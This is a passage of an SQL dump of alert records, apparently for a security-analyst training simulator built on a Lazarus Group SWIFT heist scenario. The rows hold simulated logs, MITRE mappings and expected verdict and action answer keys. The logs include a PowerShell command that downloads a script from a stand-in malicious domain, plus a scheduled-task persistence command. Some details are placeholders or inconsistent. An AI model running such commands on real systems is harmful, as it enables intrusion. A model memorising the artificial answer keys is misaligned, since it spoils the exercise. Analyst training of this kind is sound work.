x64)\\\",\\\"username\\\":\\\"jdoe\\\",\\\"email\\\":\\\"mule_coordinator@example.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"money_mule_schedule.xlsx\\\",\\\"malicious_command\\\":\\\"Invoke-WebRequest -Uri https://malicious-domain.com/mule_tasks -OutFile mule_tasks.ps1\\\",\\\"communication_type\\\":\\\"email\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:35Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"username\\\":\\\"jdoe\\\",\\\"email\\\":\\\"mule_coordinator@example.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"money_mule_schedule.xlsx\\\",\\\"malicious_command\\\":\\\"Invoke-WebRequest -Uri https://malicious-domain.com/mule_tasks -OutFile mule_tasks.ps1\\\",\\\"communication_type\\\":\\\"email\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(814, 'Anomalous Network Traffic Spikes', 'high', 'Network Traffic Monitoring', 'Network traffic monitoring has detected significant spikes in outbound traffic correlating with known exfiltration patterns. The traffic appears to be directed towards an external IP address associated with previous malicious activity. The group is potentially attempting to cover their tracks while exfiltrating remaining valuable information.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"bytes_sent\":10485760,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"md5_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"jdoe\",\"filename\":\"final_report.pdf\",\"action\":\"outbound_traffic\",\"message\":\"Detected anomalous outbound traffic spikes destined for external IPs during data exfiltration phase.\"}', '2026-01-12 22:20:16', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the host initiating the traffic.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous exfiltration activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with known malicious payloads.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_system\",\"verdict\":\"internal\",\"details\":\"Username of the account used to initiate the transaction.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"final_report.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_system\",\"verdict\":\"suspicious\",\"details\":\"Filename observed in outbound exfiltration traffic.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(815, 'Initial Compromise via Spear Phishing', 'high', 'Email gateway logs', 'Lazarus Group initiated an attack by targeting key personnel with spear-phishing emails, aiming to gain access to the bank\'s internal network. The email contained a malicious attachment disguised as a routine document.', 'Social Engineering', 'T1566.001 - Spear Phishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T08:45:34Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"email_subject\":\"Quarterly Financial Report Attached\",\"email_from\":\"john.doe@trustedsource.com\",\"email_to\":\"ceo@bank.com\",\"attachment_name\":\"Q3_Report_2023.docx\",\"attachment_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"malicious_url\":\"http://malicious-link.com/download\",\"user_agent\":\"Outlook/16.0.13328.20408\"}', '2026-01-12 22:20:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Records\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal bank network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by Lazarus Group.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-link.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"URL linked to phishing campaigns by Lazarus Group.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Compromise via Spear Phishing\",\"date\":\"2026-02-01T20:32:22.465Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(816, 'Deployment of Custom Malware', 'critical', 'Endpoint detection systems', 'Custom malware associated with the Lazarus Group was detected attempting to manipulate SWIFT software on a financial system endpoint. This malware is designed to facilitate fraudulent transactions by altering legitimate financial data.', 'Malware', 'T1071.001 - Application Layer Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:32:11Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.20\",\"file_name\":\"swift_update.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"username\":\"finance_user\",\"action\":\"malware_deployed\",\"description\":\"Custom malware swift_update.exe with hash b1946ac92492d2347c6235b4d2611184 deployed on 192.168.1.20 by user finance_user from IP 203.0.113.45\"}', '2026-01-12 22:20:52', '2026-02-16 17:58:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous Lazarus Group activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Endpoint within financial department network\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with custom malware used to manipulate financial transactions\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"swift_update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection Systems\",\"verdict\":\"malicious\",\"details\":\"Executable designed to interfere with SWIFT operations\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"finance_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(817, 'Establishing Persistence in the Network', 'high', 'Network traffic analysis', 'The Lazarus Group has been identified using persistence techniques to maintain access in the network, ensuring their ability to monitor and execute transactions over an extended period. Anomalous network traffic was detected indicating the deployment of a scheduled task to run a known backdoor malware associated with Lazarus activities.', 'Persistence Mechanisms', 'T1053', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:35Z\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"23.89.34.12\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0\",\"filename\":\"scheduled_task.exe\",\"file_hash\":\"e9b1c3f4a5b6e7d8f9c0a1b2c3d4e5f6\",\"command_line\":\"schtasks /create /tn \\\"UpdateTask\\\" /tr \\\"C:\\\\Windows\\\\system32\\\\scheduled_task.exe\\\" /sc daily /st 02:00\",\"username\":\"admin_user\",\"tags\":[\"Lazarus Group\",\"Persistence\",\"Scheduled Task\"]}', '2026-01-12 22:20:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"23.89.34.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e9b1c3f4a5b6e7d8f9c0a1b2c3d4e5f6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known Lazarus backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"scheduled_task.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"suspicious\",\"details\":\"Filename frequently used in Lazarus persistence mechanisms.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"User account used to schedule the malicious task.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(818, 'Lateral Movement to SWIFT Servers', 'critical', 'Internal network logs', 'The attacker has successfully moved laterally through the network and is targeting the SWIFT servers. This is a critical milestone in their heist operation aiming to access and manipulate the SWIFT messaging system.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-03T14:22:17Z\",\"source_ip\":\"192.168.1.104\",\"destination_ip\":\"192.168.1.200\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"swift_admin\",\"filename\":\"malware_payload.bin\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"access_granted\",\"message\":\"Successful authentication to SWIFT server using compromised credentials.\",\"event_id\":\"4672\",\"log_type\":\"authentication_success\",\"process\":\"svchost.exe\"}', '2026-01-12 22:20:52', '2026-02-16 17:58:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.104\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Intelligence\",\"verdict\":\"internal\",\"details\":\"Known internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Intelligence\",\"verdict\":\"internal\",\"details\":\"Known SWIFT server IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"swift_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Intelligence\",\"verdict\":\"internal\",\"details\":\"Compromised internal user account.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Lazarus Group malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(819, 'Manipulation of SWIFT Messages - Step 5', 'critical', 'SWIFT transaction logs', 'Lazarus Group has manipulated SWIFT messages to conceal fraudulent transactions totaling $951 million. The threat actors have executed a sophisticated operation, altering transaction details to evade detection.', 'Data Manipulation', 'T1565.002 - Data Manipulation: Transaction Manipulation', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-18T03:42:11Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user\":\"swift_operator\",\"transaction_id\":\"TXN123456789\",\"original_amount\":\"10,000 USD\",\"manipulated_amount\":\"951,000,000 USD\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"malware_filename\":\"swiftmanip.exe\",\"comment\":\"Transaction details altered successfully\",\"alert_id\":\"ALERT5678\",\"status\":\"Fraudulent\"}', '2026-01-12 22:20:52', '2026-02-16 17:59:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known Lazarus Group IP associated with financial attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal SWIFT server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Lazarus Group.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"swiftmanip.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Executable used in SWIFT transaction manipulation.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"swift_operator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Employee Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user compromised by attackers.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T03:42:11Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"swift_operator\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"original_amount\\\":\\\"10,000 USD\\\",\\\"manipulated_amount\\\":\\\"951,000,000 USD\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"swiftmanip.exe\\\",\\\"comment\\\":\\\"Transaction details altered successfully\\\",\\\"alert_id\\\":\\\"ALERT5678\\\",\\\"status\\\":\\\"Fraudulent\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T03:42:11Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"swift_operator\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"original_amount\\\":\\\"10,000 USD\\\",\\\"manipulated_amount\\\":\\\"951,000,000 USD\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"swiftmanip.exe\\\",\\\"comment\\\":\\\"Transaction details altered successfully\\\",\\\"alert_id\\\":\\\"ALERT5678\\\",\\\"status\\\":\\\"Fraudulent\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T03:42:11Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"swift_operator\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"original_amount\\\":\\\"10,000 USD\\\",\\\"manipulated_amount\\\":\\\"951,000,000 USD\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"swiftmanip.exe\\\",\\\"comment\\\":\\\"Transaction details altered successfully\\\",\\\"alert_id\\\":\\\"ALERT5678\\\",\\\"status\\\":\\\"Fraudulent\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T03:42:11Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"swift_operator\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"original_amount\\\":\\\"10,000 USD\\\",\\\"manipulated_amount\\\":\\\"951,000,000 USD\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"swiftmanip.exe\\\",\\\"comment\\\":\\\"Transaction details altered successfully\\\",\\\"alert_id\\\":\\\"ALERT5678\\\",\\\"status\\\":\\\"Fraudulent\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T03:42:11Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"swift_operator\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"original_amount\\\":\\\"10,000 USD\\\",\\\"manipulated_amount\\\":\\\"951,000,000 USD\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"swiftmanip.exe\\\",\\\"comment\\\":\\\"Transaction details altered successfully\\\",\\\"alert_id\\\":\\\"ALERT5678\\\",\\\"status\\\":\\\"Fraudulent\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(820, 'Exfiltration of Stolen Funds', 'critical', 'International bank transfer records', 'The attackers successfully exfiltrated a portion of the funds, transferring them to accounts in the Philippines for laundering. Indicators of compromise include suspicious international bank transfer activities and known malicious IP addresses linked to the Lazarus Group.', 'Data Exfiltration', 'T1048: Data Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"103.123.45.67\",\"destination_ip\":\"192.168.10.25\",\"transaction_id\":\"TXN123456789\",\"amount\":\"5,000,000 USD\",\"destination_country\":\"Philippines\",\"malware_hash\":\"f2c7a3a849b8f8c7a3a849b8f8c7a3a8\",\"suspected_tool\":\"WannaCry\",\"user\":\"internal_user@bank.com\",\"filename\":\"transfer_record.xlsx\",\"status\":\"Completed\"}', '2026-01-12 22:20:52', '2026-02-16 17:58:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"103.123.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group operations.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"f2c7a3a849b8f8c7a3a849b8f8c7a3a8\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with WannaCry malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"transfer_record.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"File used during unauthorized fund transfers.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.471Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"103.123.45.67\\\",\\\"destination_ip\\\":\\\"192.168.10.25\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"destination_country\\\":\\\"Philippines\\\",\\\"malware_hash\\\":\\\"f2c7a3a849b8f8c7a3a849b8f8c7a3a8\\\",\\\"suspected_tool\\\":\\\"WannaCry\\\",\\\"user\\\":\\\"internal_user@bank.com\\\",\\\"filename\\\":\\\"transfer_record.xlsx\\\",\\\"status\\\":\\\"Completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.471Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"103.123.45.67\\\",\\\"destination_ip\\\":\\\"192.168.10.25\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"destination_country\\\":\\\"Philippines\\\",\\\"malware_hash\\\":\\\"f2c7a3a849b8f8c7a3a849b8f8c7a3a8\\\",\\\"suspected_tool\\\":\\\"WannaCry\\\",\\\"user\\\":\\\"internal_user@bank.com\\\",\\\"filename\\\":\\\"transfer_record.xlsx\\\",\\\"status\\\":\\\"Completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.471Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"103.123.45.67\\\",\\\"destination_ip\\\":\\\"192.168.10.25\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"destination_country\\\":\\\"Philippines\\\",\\\"malware_hash\\\":\\\"f2c7a3a849b8f8c7a3a849b8f8c7a3a8\\\",\\\"suspected_tool\\\":\\\"WannaCry\\\",\\\"user\\\":\\\"internal_user@bank.com\\\",\\\"filename\\\":\\\"transfer_record.xlsx\\\",\\\"status\\\":\\\"Completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.471Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"103.123.45.67\\\",\\\"destination_ip\\\":\\\"192.168.10.25\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"destination_country\\\":\\\"Philippines\\\",\\\"malware_hash\\\":\\\"f2c7a3a849b8f8c7a3a849b8f8c7a3a8\\\",\\\"suspected_tool\\\":\\\"WannaCry\\\",\\\"user\\\":\\\"internal_user@bank.com\\\",\\\"filename\\\":\\\"transfer_record.xlsx\\\",\\\"status\\\":\\\"Completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.471Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 